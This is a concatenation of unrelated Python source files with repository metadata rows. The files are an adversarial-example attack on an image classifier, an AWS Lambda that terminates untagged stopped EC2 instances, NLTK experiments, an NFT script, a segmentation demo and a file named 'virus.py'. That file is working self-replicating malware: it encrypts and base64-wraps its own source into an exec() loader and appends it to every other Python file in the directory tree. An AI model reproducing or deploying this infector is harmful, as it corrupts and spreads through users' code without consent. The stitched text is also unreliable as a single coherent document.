img = []
count = 1
for (data, target) in self.loader:
data, target = data.to(device), target.to(device)
data_raw = copy.deepcopy(data)
# 將圖片丟入 model 進行測試 得出相對應的 class
output = self.model(data)
init_pred = output.max(1, keepdim=True)[1]
# 如果 class 錯誤 就不進行攻擊
if init_pred.item() != target.item():
wrong += 1
data_raw = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
data_raw = data_raw.squeeze().detach().cpu().numpy()
img.append(data_raw)
continue
# 如果 class 正確 就開始計算 gradient 進行攻擊
for i in range(self.iters):
data.requires_grad = True
output = self.model(data)
loss = F.nll_loss(output, target)
data_grad = torch.autograd.grad(loss, data)[0]
data = data + self.alpha * data_grad.sign()
eta = torch.clamp(data - data_raw, min=-epsilon, max=epsilon)
data = (data_raw + eta).detach()
#data = torch.clamp(data_raw + eta, min=0, max=1).detach()
perturbed_data = data
# 再將加入 noise 的圖片丟入 model 進行測試 得出相對應的 class
output = self.model(perturbed_data)
final_pred = output.max(1, keepdim=True)[1]
#print('Finish :',count)
count += 1
if final_pred.item() == target.item():
#print("fail")
# 辨識結果還是正確 攻擊失敗
adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
adv_ex = adv_ex.squeeze().detach().cpu().numpy()
img.append(adv_ex)
fail += 1
else:
# 辨識結果失敗 攻擊成功
success += 1
#print('success')
adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
adv_ex = adv_ex.squeeze().detach().cpu().numpy()
img.append(adv_ex)
final_acc = (fail / (wrong + success + fail))
print("Epsilon: {}\tTest Accuracy = {} / {} = {}\n".format(epsilon, fail, len(self.loader), final_acc))
return img, final_acc
if __name__ == '__main__':
t1 = time.time()
# 讀入圖片相對應的 label
df = pd.read_csv(sys.argv[1] + "/labels.csv")
df = df.loc[:, 'TrueLabel'].to_numpy()
label_name = pd.read_csv(sys.argv[1] + "/categories.csv")
label_name = label_name.loc[:, 'CategoryName'].to_numpy()
# new 一個 Attacker class
attacker = Best_Attacker(sys.argv[1] + "/images", df)
# 要嘗試的 epsilon
epsilons = [0.1]
accuracies, examples = [], []
# 進行攻擊 並存起正確率和攻擊成功的圖片
for eps in epsilons:
#ex, acc = attacker.attack(eps)
img, acc = attacker.attack(eps)
accuracies.append(acc)
#examples.append(ex)
number = 0
save_path = sys.argv[2]
if not os.path.isdir(save_path):
os.mkdir(save_path)
save_path = save_path + '/'
for ex in img:
ex = 255 * np.array(ex).astype(np.float32)
ex = np.swapaxes(ex,0,1)
ex = np.swapaxes(ex,1,2)
#print(ex.shape)
ex[:,:,[0,2]] = ex[:,:,[2,0]] # chage the color channel
if len(str(number)) == 1:
name = '00' + str(number)
cv2.imwrite(save_path+str(name)+'.png', ex)
elif len(str(number)) == 2:
name = '0' + str(number)
cv2.imwrite(save_path+str(name)+'.png', ex)
else:
cv2.imwrite(save_path+str(number)+'.png', ex)
number += 1
t2 = time.time()
print("Execute time :" + str(t2-t1))
| Peter870512/ML_2020Spring | HW6/hw6_best.py | hw6_best.py | py | 6,895 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.device",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torchvision.tr... |
32786726933 | import boto3
import re
from datetime import datetime, timedelta
import os
def lambda_handler(event, context):
TERMINATION_AGE = 0
ec2_client = boto3.client('ec2', region_name='us-east-1')
# Get a list of stopped instances
instances = ec2_client.describe_instances(Filters=[{'Name': 'instance-state-name', 'Values': ['stopped']}])
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
# Check if instance has the required tag
tags = instance.get('Tags', [])
has_required_tag = False
for tag in tags:
if tag['Key'] == 'TerminateOnIdle':
has_required_tag = True
break
# If instance does not have the tag, terminate it
if not has_required_tag:
# StateTransitionReason might be like "i-xxxxxxxx User initiated (2016-05-23 17:27:19 GMT)"
reason = instance['StateTransitionReason']
date_string = re.search('User initiated \(([\d-]*)', reason).group(1)
if len(date_string) == 10:
date = datetime.strptime(date_string, '%Y-%m-%d')
# Terminate if older than TERMINATION_AGE
if (datetime.today() - date).days + 1 > TERMINATION_AGE:
ec2_client.terminate_instances(InstanceIds=[instance['InstanceId']])
| SuleymanBat/TROUBLESHOOTING_SOLUTIONS_FOR_DEVOPS | TERRAFORM/terraform-stoppedEC2s/lambda.py | lambda.py | py | 1,468 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.client",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",... |
26238422374 | import logging
import logging.config
import os
from typing import Union
class Reporter:
def __init__(self,
logger: Union[logging.Logger, None] = None,
lvl: int = logging.INFO) -> None:
"""Reporter Class.
Parameters
----------
logger : logger or None
The logger object to use.
lvl : int
Logging level to write to.
"""
self.logger = logger or logging.getLogger(__name__)
self.log_level = lvl
self.log_path = os.path.join(os.getcwd(), 'report.log')
self._setup_logger()
def log(self,
msg: str,
lvl: int = logging.INFO) -> None:
"""Logs a message with a given level.
Parameters
----------
msg : str
Message to log.
lvl : int
Level with which to log the message.
"""
self.logger.log(lvl, msg)
def _setup_logger(self) -> None:
"""Initialises the logger using the basic config."""
logging.basicConfig(
level=self.log_level,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
filename=self.log_path,
filemode='w'
)
| danielkelshaw/PySwallow | pyswallow/utils/reporter.py | reporter.py | py | 1,301 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "logging.Logger",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger"... |
72274079145 | from typing import Tuple, List
import pandas as pd
import time
import re
import functools
class Processor:
def __init__(self, dataframe: pd.DataFrame):
self._df = dataframe
def get(self):
return self._df.copy()
def __repr__(self) -> str:
return self._df.__repr__
def __str__(self) -> str:
return self._df.__str__
def keep_dtypes(self, keep_dt: List[str]):
df = self._df.copy()
keep_cols = []
dtypes = df.dtypes
for col in df.columns:
if dtypes[col] in keep_dt:
keep_cols.append(col)
df = df[keep_cols]
return Processor(df)
def exclude_cols(self, exclude_cols: List[str]):
df = self._df.copy()
keep_cols = []
for col in df.columns:
keep = True
for pattern in exclude_cols:
if re.match(pattern, col):
keep = False
break
if keep:
keep_cols.append(col)
df = df[keep_cols]
return Processor(df) | hungngocphat01/python-mutils | mutils/pandas.py | pandas.py | py | 1,113 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "re.match",
"line_num... |
72150153383 | import chunk
from nltk.tokenize import word_tokenize,sent_tokenize ,PunktSentenceTokenizer
from nltk.corpus import stopwords,state_union
from nltk.stem import PorterStemmer
import nltk
def token(inputs):
# input = "hi vi what time is it"
return (sent_tokenize(inputs))
def sw():
text = "token is showing this shit"
stop_words = set(stopwords.words("english"))
words = word_tokenize(text)
filtered = [w for w in words if w not in stop_words]
print(filtered)
def stem():
ps = PorterStemmer()
ex = ['python' , 'pythoner' 'pythoning']
text ='its very importent to be pythonly when you are pythoning with python'
re = [ps.stem(w) for w in token(text)]
print(re)
def partofspeechtagging():
sample = state_union.raw("2005-GWBush.txt")
train_sample = state_union.raw("2006-GWBush.txt")
costum_set_token = PunktSentenceTokenizer(train_sample)
tokenized = costum_set_token.tokenize(sample)
chunkgram = r"""Chunk:{<.*>+}
}<VB.?|IN|DT>+{ """
# chunkgram = r"""Chunk:{<RB.?>*<VB.?>*<NNP>+<NN>?}"""
chunkparser = nltk.RegexpParser(chunkgram)
for n,i in enumerate(tokenized):
words = word_tokenize(i)
tagged = nltk.pos_tag(words)
chunked = chunkparser.parse(tagged)
chunked.pretty_print()
# print(dir(chunked))
break
# words = word_tokenize('search for css in youtube')
# tagged = nltk.pos_tag(words)
# chunkgram = r"""Chunk:{<VB.?>*}"""
# chunkparser = nltk.RegexpParser(chunkgram)
# chunked = chunkparser.parse(tagged)
# print(chunked)
# sw()
# partofspeechtagging()
# stem()
postags = """
CC coordinating conjunction
CD cardinal digit
DT determiner
EX existential there (like: “there is” … think of it like “there exists”)
FW foreign word
IN preposition/subordinating conjunction
JJ adjective ‘big’
JJR adjective, comparative ‘bigger’
JJS adjective, superlative ‘biggest’
LS list marker 1)
MD modal could, will
NN noun, singular ‘desk’
NNS noun plural ‘desks’
NNP proper noun, singular ‘Harrison’
NNPS proper noun, plural ‘Americans’
PDT predeterminer ‘all the kids’
POS possessive ending parent’s
PRP personal pronoun I, he, she
PRP$ possessive pronoun my, his, hers
RB adverb very, silently,
RBR adverb, comparative better
RBS adverb, superlative best
RP particle give up
TO, to go ‘to’ the store.
UH interjection, errrrrrrrm
VB verb, base form take
VBD verb, past tense took
VBG verb, gerund/present participle taking
VBN verb, past participle taken
VBP verb, sing. present, non-3d take
VBZ verb, 3rd person sing. present takes
WDT wh-determiner which
WP wh-pronoun who, what
WP$ possessive wh-pronoun whose
WRB wh-abverb where, when
"""
import re
exampleString = '''
Jessica is 15 years old, and Daniel is 27 years old.
Edward is 97 years old, and his grandfather, Oscar, is 102.
'''
ages = re.findall(r'\d{1,3}',exampleString)
names = re.findall(r'[A-Z][a-z]*',exampleString)
# print(ages)
# print(names)
example = 'search for youtube hkjhk in duckduckgo'
re.findall(r'@([a-zA-Z]+)','gfgfdAAA1234ZZZuijjk')
finel = re.findall('(search for) (.*) (in) (.*)' ,example)
# print(finel)
# print(re.findall('(search for|look for|find) (.+) (in|on) (.+)', sample))
def partofspeechtagging():
sample = state_union.raw("2005-GWBush.txt")
train_sample = state_union.raw("2006-GWBush.txt")
costum_set_token = PunktSentenceTokenizer(train_sample)
tokenized = costum_set_token.tokenize(sample)
for i in tokenized:
words = word_tokenize(i)
tagged = nltk.pos_tag(words)
namedEnt = nltk.ne_chunk(tagged,binary= 1)
namedEnt.draw()
# partofspeechtagging()
# sample="search for css animatation on youtube"
def lemtze():
from nltk.stem import WordNetLemmatizer
lem = WordNetLemmatizer()
print(lem.lemmatize('better' , "a"))
from nltk.corpus import gutenberg
sample = gutenberg.raw('bible-kjv.txt')
tok = sent_tokenize(sample)
print(tok[5:15] )
| astroxiii/VI-CORE | expirment.py | expirment.py | py | 4,160 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.tokenize.sent_tokenize",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 12,
"usage_type": "name"
},
{
"api_... |
3273044860 | #!/usr/bin/env python3
import base64
import hashlib
import os
import random
import string
from subprocess import Popen, PIPE
API = "https://corona-stats.online?top=15"
def execute_payload():
print("######### DONT BE A COVIDIOT, STAY @ HOME #########")
cmd1 = Popen(["curl", "-s"] + [API], stdout=PIPE)
cmd2 = Popen(["head", "-n", "37"], stdin=cmd1.stdout)
cmd1.wait()
cmd2.wait()
def create_copy():
try:
return y
except NameError:
with open(os.path.basename(__file__), 'r') as source:
data = []
for line in source:
data.append(line)
return "".join(data)
def otp_keygen(size):
return ''.join([random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(size)])
def xor_strs(s1, s2):
return ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(s1, s2))
def encrpyt_it(stuff_to_encrpyt):
key = otp_keygen(len(stuff_to_encrpyt))
cipher_text = xor_strs(stuff_to_encrpyt, key)
return cipher_text, key
def wrap(asset):
encrpyted_asset, key = encrpyt_it(asset)
base64_encoded_and_encrypted = base64.b64encode(str.encode(encrpyted_asset))
return "exec('import base64;x=base64.b64decode(str.encode(\\'{0}\\'));" \
"y=\\'\\'.join(chr(ord(a) ^ ord(b)) for a, b in zip(x.decode(), \\'{1}\\'));" \
"exec(y, {{\\'y\\':y}})')".format(base64_encoded_and_encrypted.decode(), key)
def check_if_infected(hash_value, file):
real_hash = hashlib.sha256(file.encode())
return real_hash.hexdigest() == hash_value
def infect(troy):
for root, _, files in os.walk('.'):
for file in files:
relative_path = root + '/' + file
if file.endswith(".py") and relative_path != "./virus.py":
with open(relative_path, 'r') as original:
data = original.read().split('\n')
last_line = data[-1]
if last_line.startswith("#*!@"):
if check_if_infected(last_line[4:].rstrip('\n'), '\n'.join(data[:-1])):
continue
else:
data = '\n'.join(data[:-2])
else:
data = '\n'.join(data)
with open(relative_path, 'w') as modified:
new_content = "{0}\n{1}".format(data, troy)
content_hash = hashlib.sha256(new_content.encode())
modified.write("{0}\n#*!@{1}".format(new_content, content_hash.hexdigest()))
def virus_routine():
execute_payload()
malicious_copy = create_copy()
troy = wrap(malicious_copy)
infect(troy)
virus_routine()
| ysyesilyurt/virus.py | sandbox/virus.py | virus.py | py | 2,726 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "subprocess.Popen",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "subprocess.Popen",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
... |
22035870178 | import asyncio, gbulb, logging, logging.handlers
from multiprocessing import Process
from python_dbus_system_api import start_server
from ustatus.ustatus import Ustatus
from ustatus.utils.notifications import notify_error
def main():
setup_logging()
# Ensure API is running (if already running this will just queue to get the
# bus name)
api_process = Process(target=start_server)
api_process.start()
gbulb.install(gtk=True) # only necessary if you're using GtkApplication
application = Ustatus()
loop = asyncio.get_event_loop()
try:
loop.run_forever(application=application)
except Exception as e:
notify_error(summary="Uncaught error", body=f"e")
def setup_logging():
logging.basicConfig(
level=logging.INFO,
style="{",
format="[{levelname}({name}):{filename}:{funcName}] {message}",
)
root_logger = logging.getLogger()
sys_handler = logging.handlers.SysLogHandler(address="/dev/log")
root_logger.addHandler(sys_handler)
if __name__ == "__main__":
main()
| mbrea-c/ustatus | src/ustatus/main.py | main.py | py | 1,070 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "multiprocessing.Process",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "python_dbus_system_api.start_server",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "gbulb.install",
"line_number": 16,
"usage_type": "call"
},
{
"api_nam... |
42737050383 | from brownie import network, AdvancedCollectible
from scripts.helpful_scripts import get_account, get_gtype, OPENSEA_URL
# File uploaded to IPFS and took the
god_metadata_dic = {
"SHIVA": "https://ipfs.io/ipfs/QmULNZ8umdtXYAUB5y9UpaLXBNmN7SCgcpnMbEdx5eSEyi?filename=0-SHIVA.json",
# "GANESH": "https://ipfs.io/ipfs/QmXx7UhfFnSrFmGhDsPurdLQEC1Dv4yZPkYfx4E5aAmh68?filename=1-GANESH.json",
"HANUMAN": "https://ipfs.io/ipfs/Qmf4TKekSuWnJ1reqWqju5KakLa4QA546VzP5cWdSXFVNp?filename=1-HANUMAN.json",
}
def main():
print(f"Working on {network.show_active()}")
advanced_collectible = AdvancedCollectible[-1]
number_of_collectibles = advanced_collectible.tokenCounter()
print(f"You have {number_of_collectibles} tokenIds")
for token_id in range(number_of_collectibles):
gtype = get_gtype(advanced_collectible.tokenIdToGodType(token_id))
if not advanced_collectible.tokenURI(token_id).startswith("https://"):
print(f"Setting tokenURI of {token_id}")
set_tokenURI(token_id, advanced_collectible, god_metadata_dic[gtype])
def set_tokenURI(token_id, nft_contract, tokenURI):
account = get_account()
tx = nft_contract.setTokenURI(token_id, tokenURI, {"from": account})
tx.wait(1)
print(
f"You can view your NFT at {OPENSEA_URL.format(nft_contract.address, token_id)}"
)
| shubhamghimire/nft-demo | scripts/advanced_collectible/set_tokenuri.py | set_tokenuri.py | py | 1,360 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "brownie.network.show_active",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "brownie.network",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "brownie.AdvancedCollectible",
"line_number": 14,
"usage_type": "name"
},
{
"api_name"... |
10650544707 | # Server that provides some services related with genes and chromosomes using the HTTP protocol.
# The user introduces the parameters through the main page HTML, the data is taken from the rest.ensembl.org
# web page and the results are presented in another HTML page.
# importing the needed resources
import http.server
import http.client
import json
import socketserver
import termcolor
# Server's port
PORT = 8000
# Client
HOSTNAME = "rest.ensembl.org"
ENDPOINT0 = "/info/species?content-type=application/json"
METHOD = "GET"
headers = {'User-Agent': 'http-client'}
conn = http.client.HTTPSConnection(HOSTNAME)
# Function with the endpoint dependent part
def client(endpoint):
"""function of a common client that asks information using json"""
# -- Sending the request
conn.request(METHOD, endpoint, None, headers)
r1 = conn.getresponse()
# -- Printing the status
print()
print("Response received: ", end='')
print(r1.status, r1.reason)
# -- Read the response's body and close connection
text_json = r1.read().decode("utf-8")
conn.close()
return json.loads(text_json)
# Seq class for gene questions
class Seq:
"""A class for representing sequences"""
def __init__(self, strbases):
self.strbases = strbases # self.strbases now represents my species name
# Obtaining the ID of a species
def id(self):
ENDPOINT3 = "/lookup/symbol/homo_sapiens/" + self.strbases + "?content-type=application/json"
result3 = client(ENDPOINT3)
return result3["id"]
# Obtaining the sequence from an ID
def gene_seq(self):
ENDPOINT4 = "/sequence/id/" + self.id() + "?content-type=application/json"
result4 = client(ENDPOINT4)
return result4["seq"]
# Length of the string
def len(self):
return len(self.gene_seq()) # returns the length of our string(self.gene_seq())
# Number of a concrete base
def count(self, base):
res = self.gene_seq().count(base) # counting the base that we will introduce
return res
# Percentage of a concrete base
def perc(self, base):
tl = self.len()
for e in base:
n = self.count(e)
res = round(100.0 * n / tl, 1) # percentage with one decimal of precision
return res
# Results presentation
def results(self):
bases = "ACTG"
s1 = "The total number of bases is: "+str(self.len())
s2 = "" # empty string to save the percentage results of the following loop
for b in bases:
s2 += "The percentage of " + b + " is: " + str(self.perc(b)) + "%" + "<br>"
return s1 + "<br><br>" + s2
# Class with our Handler that inheritates all his methods and properties
class TestHandler(http.server.BaseHTTPRequestHandler): # Objects with the properties of the library
def do_GET(self):
"""This method is called whenever the client invokes the GET method
in the HTTP protocol request"""
# Printing in the server some useful information
print("GET received")
print("Request line:" + self.requestline)
print(" Cmd: " + self.command)
print(" Path: " + self.path)
# Separating and selecting the information of the path
res = self.path.split("?")[0]
p = (self.path.replace("=", ",")).replace("&", ",")
ins = p.split(",") # Making a list of instructions dividing the string in the = and & symbols
# Some important parameters
text = "" # Empty string that will save the response information
sp = Seq(ins[-1]) # Object used in the genes calculations
page = "response.html" # The page will be response except if the endpoint is "/" or it does not exist
try:
if self.path == "/": # Using the resource / to obtain the main page with all the options
page = "main-page.html"
elif res == "/listSpecies": # Using the resource /listSpecies
result0 = client(ENDPOINT0)
# The variable limit has been created to avoid the error "referenced before assignment"
limit = ""
# The second parameter is the limit
if len(ins) == 2:
limit = int(ins[1])
# Using elif instead of else to avoid sending the list of species with 3 or more parameters
elif len(ins) == 1:
limit = len(result0["species"]) # If there is no limit the loop will be over all the species
for index in range(limit):
text += result0["species"][index]["name"] + "<br>"
elif res == "/karyotype": # Using the resource /karyotype
ENDPOINT1 = "/info/assembly/"+ins[-1]+"?content-type=application/json"
result1 = client(ENDPOINT1)
for chrom in result1["karyotype"]: # Transformation into a string with intros "<br>"
text += chrom+"<br>"
elif res == "/chromosomeLength": # Using the resource /chromosomeLength
specie = ins[1]
ch = ins[-1]
ENDPOINT2 = "/info/assembly/"+specie+"/"+ch+"?content-type=application/json"
result2 = client(ENDPOINT2)
text += str(result2["length"]) # Obtaining the value that corresponds to the length keyword
elif res == "/geneSeq": # Using the resource /geneSeq
text += sp.gene_seq() # calling the method gene_seq to obtain the sequence of the sp object
elif res == "/geneInfo":
id_number = sp.id() # calling the method id to obtain the identity number of the sp object
ENDPOINT5 = "/overlap/id/" + id_number + "?feature=gene;content-type=application/json"
result4 = client(ENDPOINT5) # Dictionary that contains several lists of information for different genes
a = "" # This variable avoids the error "referenced before assignment"
for i in range(len(result4)): # loop to search which gene is the one that coincides with our requisites
if result4[i]["id"] == id_number: # the correct information is in the list in which is our id gene
a = i
# Searching the values in the selected list
text += "Start: " + str(result4[a]["start"]) + "<br>"
text += "End: " + str(result4[a]["end"]) + "<br>"
text += "Length: " + str(result4[a]["end"] - result4[a]["start"] + 1) + "<br>" # sum also 1st position
text += "ID: " + str(result4[a]["id"]) + "<br>"
text += "Chromosome: " + str(result4[a]["seq_region_name"]) + "<br>"
elif res == "/geneCalc": # Using the resource /geneCalc
text += sp.results() # calling the results method
elif res == "/geneList": # Using the resource /geneList
start = ins[3]
end = ins[-1]
ch = ins[1]
ENDPOINT6 = "/overlap/region/human/"+ch+":"+start+"-"+end+"?content-type=application/json;feature=gene"
result5 = client(ENDPOINT6)
# Searching the name of each gene in the dictionary
for index in range(len(result5)):
text += result5[index]["external_name"] + "<br>"
# Preventing some common errors
if start == end:
text += "<b>"+"Sorry, you have introduced the same number for the start than for the end."+"</b>"
text += "<b>"+"<br><br>"+"So obviously, as there is no region, there is no gene contained."+"</b>"
if text == "":
text += "<b>"+"There is no gene in the selected region"+"</b>"
else:
page = "error.html" # If it is not one of the previous resources
# improvement in the server to avoid taking as correct an extra valid parameter. Ex: gene=FRAT1&gene=BRAF
if res in ["/karyotype", "/chromosomeLength", "/geneSeq", "/geneInfo", "/geneCalc", "/geneList"]:
# checking the length of the instructions and generating a KeyError if they are not correct
if len(ins) > 2 and res != "/chromosomeLength" and res != "/geneList":
text += client(ENDPOINT0)["e"]
elif (len(ins) > 4 and res == "/chromosomeLength") or (len(ins) > 6 and res == "/geneList"):
text += client(ENDPOINT0)["e"]
# Dealing with the main errors
except ValueError:
text = "<b>"+"Incorrect value in the parameter 'limit'"+"<br>"+"Please introduce an integer number"+"</b>"
except TypeError:
text = "<b>"+"Sorry, the endpoint '/listSpecies' does not admit three or more parameters"+"</b>"
except KeyError:
text = "<b>"+"Incorrect parameters"+"<br>"+"Please review their spelling and the amount required"+"</b>"
except Exception: # Emergency exception that has not been detected yet
text = "<b>"+"Sorry, an error has been produced"+"<br>"+"Please review the performed actions"+"</b>"
# -- printing the request line
termcolor.cprint(self.requestline, 'green')
# -- Opening the selected page
f = open(page, 'r')
contents = f.read() # reading the contents of the selected page
# If the html response page is requested change the word text by the text of the user
if page == "response.html":
contents = contents.replace("text", text)
# Generating and sending the response message according to the request
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', len(str.encode(contents)))
self.end_headers()
# -- sending the body of the response message
self.wfile.write(str.encode(contents))
# -- MAIN PROGRAM
socketserver.TCPServer.allow_reuse_address = True # preventing the error: "Port already in use"
# main loop to attend the user
with socketserver.TCPServer(("", PORT), TestHandler) as httpd:
# "" means that the program must use the IP address of the computer
print("Serving at PORT: {}".format(PORT))
try:
httpd.serve_forever()
except KeyboardInterrupt:
httpd.server_close()
print("The server is stopped")
| paugarciar/2018-19-PNE-Final-project | some tests (drafts)/server_without json object.py | server_without json object.py | py | 10,515 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "http.server.client.HTTPSConnection",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "http.server.client",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "http.server",
"line_number": 21,
"usage_type": "name"
},
{
"api_name":... |
2031636755 | import os
import sys
import torch
import numpy as np
import time
cur_path = os.path.abspath(os.path.dirname(__file__))
root_path = os.path.split(cur_path)[0]
sys.path.append(root_path)
from torchvision import transforms
from PIL import Image
from segmentron.utils.visualize import get_color_pallete
from segmentron.models.model_zoo import get_segmentation_model
from segmentron.utils.options import parse_args
from segmentron.utils.default_setup import default_setup
from segmentron.config import cfg
def demo():
args = parse_args()
args.test = True
##############################################
# args.config_file = "configs/trans10kv2/trans2seg/trans2seg_medium_all_sber.yaml"
# args.input_img = "tools/4.jpg"
##############################################
cfg.update_from_file(args.config_file)
cfg.update_from_list(args.opts)
cfg.PHASE = 'test'
cfg.ROOT_PATH = root_path
##############################################
# cfg.TEST.TEST_MODEL_PATH = "./workdirs/trans10kv2/trans2seg_medium/Sber2400_50_All_classes.pth"
# cfg.DATASET.NAME = "sber_dataset_all"
##############################################
# cfg.TEST.TEST_MODEL_PATH = args.model_path
cfg.check_and_freeze()
print(cfg.TEST.TEST_MODEL_PATH)
default_setup(args)
# create output folders
output_dir = os.path.join(cfg.VISUAL.OUTPUT_DIR, 'vis_result_{}_{}_{}_{}'.format(
cfg.MODEL.MODEL_NAME, cfg.MODEL.BACKBONE, cfg.DATASET.NAME, cfg.TIME_STAMP))
if not os.path.exists(output_dir):
os.makedirs(output_dir+"/Flipped")
os.makedirs(output_dir+"/Orig")
os.makedirs(output_dir+"/Merged_mask")
os.makedirs(output_dir+"/Orig_confidence")
os.makedirs(output_dir+"/Flipped_confidence")
# pathes for different images
confidence_flipped_dir=output_dir+"/Flipped_confidence"
confidence_output_dir=output_dir+"/Orig_confidence"
flipped_dir=output_dir+"/Flipped"
merged_dir=output_dir+"/Merged_mask"
output_dir=output_dir+"/Orig"
# image transform
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(cfg.DATASET.MEAN, cfg.DATASET.STD),
])
# create the model using the configuration
model = get_segmentation_model().to(args.device)
model.eval()
# softmax layer for confidence
softmax_layer = torch.nn.Softmax(dim=0)
if os.path.isdir(args.input_img):
img_paths = [os.path.join(args.input_img, x) for x in os.listdir(args.input_img) if "." in x]
else:
img_paths = [args.input_img]
# print("Images for inference:")
# print(img_paths)
print("\n Output file path: ", output_dir)
# print("\n CFG: /n", cfg)
print("Dataset Name: ", cfg.DATASET.NAME)
for img_path in img_paths:
image = Image.open(img_path).convert('RGB')
# getting the flipped image
flipped_image = Image.open(img_path).convert('RGB')
size_ = image.size
flipped_image = flipped_image.transpose(method = Image.FLIP_LEFT_RIGHT)
flipped_image = flipped_image.resize((cfg.TRAIN.BASE_SIZE, cfg.TRAIN.BASE_SIZE), Image.BILINEAR)
flipped_image = transform(flipped_image).unsqueeze(0).to(args.device)
image = image.resize((cfg.TRAIN.BASE_SIZE, cfg.TRAIN.BASE_SIZE), Image.BILINEAR)
# images = transform(image).unsqueeze(0).to(args.device)
image = transform(image).unsqueeze(0).to(args.device)
# merging the two images in one batch
images = torch.cat((image, flipped_image), 0)
with torch.no_grad():
output = model(images)
# Get the mask
pred = torch.argmax(output[0], 1)[0].cpu().data.numpy()
pred_f = torch.argmax(output[0], 1)[1].cpu().data.numpy()
output_norm = softmax_layer(output[0])
confidence_all = torch.max(output_norm, 1)[0].cpu().data.numpy()*255
mask = get_color_pallete(pred, cfg.DATASET.NAME)
mask_f = get_color_pallete(pred_f, cfg.DATASET.NAME)
mask = mask.resize(size_)
mask_f = mask_f.resize(size_)
mask_f = mask_f.transpose(method = Image.FLIP_LEFT_RIGHT)
# get the result of cropped images (in this case no cropping just flipping)
cropping_results = [np.array(mask), np.array(mask_f)]
cropping_edges = [[0, 0, size_[0], size_[1]], [0, 0, size_[0], size_[1]]]
outname = os.path.splitext(os.path.split(img_path)[-1])[0] + '.png'
mask.save(os.path.join(output_dir, outname))
mask_f.save(os.path.join(flipped_dir, outname))
# Calc confidence
confidence = np.array(confidence_all, dtype=np.uint8)[0]
conf_img = Image.fromarray(confidence)
conf_img = conf_img.resize(size_, Image.BILINEAR)
conf_img.save(os.path.join(confidence_output_dir, outname))
confidence_f = np.array(confidence_all, dtype=np.uint8)[1]
conf_img_f = Image.fromarray(confidence_f)
conf_img_f = conf_img_f.resize(size_, Image.BILINEAR)
conf_img_f = conf_img_f.transpose(method = Image.FLIP_LEFT_RIGHT)
conf_img_f.save(os.path.join(confidence_flipped_dir, outname))
cropping_confidence = [conf_img, conf_img_f]
# mask_f.save(os.path.join(flipped_dir, outname))
# the result of the merged images
merged_result = getMergedSemanticFromCrops(cropping_results, cropping_confidence, cropping_edges, "And", [size_[1], size_[0]])
merged_result.save(os.path.join(merged_dir, outname))
# function merging images
def getMergedSemanticFromCrops(crops_result, crops_confidence, crops_edges, function, full_size):
'''
function for merging the results from two or more images
'''
palette_mirror = 0
palette_glass = 1
palette_OOS = 3
palette_floor = 4
palette_FU = 2
palette_BG = 5
#################################################################
####################### Using And function ######################
#################################################################
if function.lower() == "and":
# rospyLogInfoWrapper("Using And for merging cropped images")
orig_glass = crops_result[0]==palette_glass
orig_mirror = crops_result[0]==palette_mirror
orig_OOS = crops_result[0]==palette_OOS
orig_floor = crops_result[0]==palette_floor
orig_FU = crops_result[0]==palette_FU
# classes = [np.ones(full_size) for _ in range(max_clasess)]
# merged_classes = []
for i in range(1, len(crops_result)):
cropped_glass = crops_result[i]==palette_glass
cropped_mirror = crops_result[i]==palette_mirror
cropped_OOS = crops_result[i]==palette_OOS
cropped_floor = crops_result[i]==palette_floor
cropped_FU = crops_result[i]==palette_FU
cropped_all_optical = np.logical_or(cropped_mirror, cropped_glass)
cropped_all_optical = np.logical_or(cropped_all_optical, cropped_OOS)
cropped_all_floor = np.logical_or(cropped_FU, cropped_floor)
cropped_all_optical_extended = np.ones(full_size)
cropped_all_optical_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_all_optical
